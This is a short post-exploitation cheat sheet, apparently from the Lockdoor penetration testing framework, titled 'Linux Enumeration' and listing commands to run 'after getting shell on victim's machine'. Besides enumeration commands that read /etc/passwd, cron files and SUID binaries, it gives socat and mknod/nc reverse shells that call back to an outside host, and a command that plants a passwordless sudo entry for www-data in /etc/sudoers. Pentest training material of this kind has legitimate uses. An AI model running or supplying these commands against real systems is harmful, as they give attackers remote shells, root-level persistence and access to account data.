Lockdoor Framework

A Penetration Testing Framework

View on GitHub

Linux Enumeration

Things to do after getting shell on victim’s machine

>find / -xdev -type d -perm -0002 -ls 2> /dev/null

- Find World Writable Files

```ShellSession
find / -xdev -type f -perm -0002 -ls 2> /dev/null
>find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
>cat /etc/*-release
>netstat -antup
>sudo -l
>uname -a
>cat /etc/cron*
>ip addr
>cat /etc/passwd
>      $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
- Connect
>      $ socat file:`tty`,raw,echo=0 tcp-listen:4444
>mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
>dpkg -l <application name>
>echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers